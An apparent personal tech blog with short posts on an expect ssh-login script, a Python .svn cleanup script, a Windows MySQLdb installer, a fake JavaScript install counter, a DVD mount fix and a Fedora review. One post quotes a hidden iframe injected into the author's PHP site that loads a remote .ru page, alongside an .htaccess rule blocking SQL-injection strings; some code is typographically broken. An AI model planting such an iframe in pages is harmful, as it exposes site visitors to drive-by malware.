Short Expect Tutorial

So lets say you wanted to automate a login into a machine using ssh but not having to do the ssh key sharing thats explained in many posts including this one. You could use expect to do the same thing and more. Below is a script that you pass the domain you want to connect to, the password and the command to run and it runs this automatically. You need expect inorder to run this. save the below as file run.exp:

1. spawn ssh [lindex $argv 0]
2. set psd [lindex $argv 1]
3. set cmd [lindex $argv 2]
4. expect “Password:”
5. send “$psdr”
6. expect “.*”
7. send “$cmdr”
8. expect eof

  • spawn: used to start a program
  • expect: used to wait for a string
  • send: used to send command
  • interact: used to switch the control to the user.

You can run this as: ./run.exp <root@myhost> <mypassword> <thecommandtorun>

e.g ./run.exp root@foo.bar bob123 w

this would ssh into foo.bar as user root using password bob123 and then show a listing of everyone who is logged in and what they are doing.

Recurse through directory (Python Style)

So i recently had an issue with the .svn directories that svn creates in each and every folder in a version controlled project. I figured i could delete the offending .svn directories by writing a small script. Here is what i ended up with:

from os.path import join, getsize
import os,shutil
for root, dirs, files in os.walk(‘<project path here >’):
for x in dirs:
if x == ‘.svn’:
print “removing ..” + root + “/” + x
shutil.rmtree(root + “/” + x

Hope it helps someone else 😉

Mysqdb for Python 2.5 under Windows

I recently  had to  port a linux based python project to a windows platform. The python project makes use of the sqlalchemy framework and thus required the MysqlDb module too.  Windows platform has python 2.5 and after searching for a while i realised that the python and mysql dudes seem to be taking their time to intergrate the 2. luckily some german dudes have a solution. If you ever have to use python with mysql under windows try this link.

http://biohackers.net/wikiattach/Python2(2e)5/attachments/MySQL-python.exe-1.2.1_p2.win32-py2.5.exe

Html Injection

malware
Yesterday I got a message from google about my adwords account having been suspended. Reason being a suspected malware infection on my site. I Then checked my site code and realised that yes i had been compromised the code below had somehow been added to my php files:

<div style=”display:none”><iframe width=415 height=797 src=”http://age-inf.ru:8080/index.php” ></iframe></div><div style=”display:none”></div><div style=”display:none”>

From the above, it seems this loads a page in the background within an iframe without the users consent, i dont even want to know what happens when you load that url. Anyway for those of you who might find themselves in a similar situation, I managed to solve this by altering my .htaccess file and adding the contents below to it:

RewriteCond %{QUERY_STRING} ^.*(;|<|>|’|”|)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* – [F]

Some people are suggesting playing around with mod_rewrite but I’m not too sure if thats the safest way to deal with it. One question remains, how was the html injected in the first place?

Klicknation Lies

http://klicknation.com/
So here i was going through this add i got through this site i found through google ads, Klicknation. I figured I’d go through the site since they seem to have a ‘catchy’ name. They have this installation counter on front page like the one i’ve attached. so me being as curios as i was , wanted to find out how they update their ‘installs’ counter coz i remember firefox has one too. I went through the site code and they slapped on a simple javascript counter that just randomly comes up with a number. Those are not installs ,its just a number generated from the date. code below, Shame on you!!!:

var date = new Date().getTime()/1000;
var count = Math.round(7103455+(date-1234398246)/9);
function addCommas(x1)
{
var rgx = /(d+)(d{3})/;
while (rgx.test(x1)) {
x1 = x1.replace(rgx, ‘$1’ + ‘,’ + ‘$2’);
}
return x1;
}
function inccount()
{
count = count + 1;
out = document.getElementById(‘counter’);
out.innerHTML = addCommas(count.toString());
}
window.setInterval(inccount, 5000);

DVD not read under linux but read under Windows

So, today my dvd rom drive just decided not to work. I thought it was a dirty laser or something. Cleaned that but still it would not budge.
I then tried to manually mount it by adding the following entry to etc fstab:

/dev/sr0 /media/dvd auto,iso9660 ro,user,noauto,unhide 0 0

and running: mount /dev/sr0 as root on command line
now i can’t be doing this everytime i pop a disk in drive. I mean its been working before.
After a few searches i came across this entry made by Hal that has been causing this whole mess.

in

File: /etc/hal/fdi/information/media-check-disable-storage_model_$YOUR_DEVICE.fdi

false

If the key is set to false (it was in my case), all you have to do is to change the value of the key to true.

good luck.
I’m using Fedora 10 x86

Hello Gnome

So a couple of weeks ago i made the bold move to move from opensuse 11.0 to Fedora 10. My take on it.., i aint looking back at all. I’m actually impressed. I have to admit though, i kinda miss YAST, that there is a jewel. it will take a lot i guess to get a replacement. Yum seems to do the job, I’ve upgraded to yum presto, its a bit faster.

One thing though i’ve noticed is , gnome seems to be polished now. I remember using gnome on Redhat a few years back.It was not exactly the best thing, and made me choose KDE. Speakin of KDE, it seems to be getting blotted, or maybe its my suse 64bit installation. I had kde4.1, and i have to admit maybe i’m one of those guys who just want to resist change, but the idea of having to use a widget to access my desktop wasnt working.

I use java a lot in my day job, and i’ve found gnome isn’t that resource hungry compared to kde. I’m now using gnome and happy.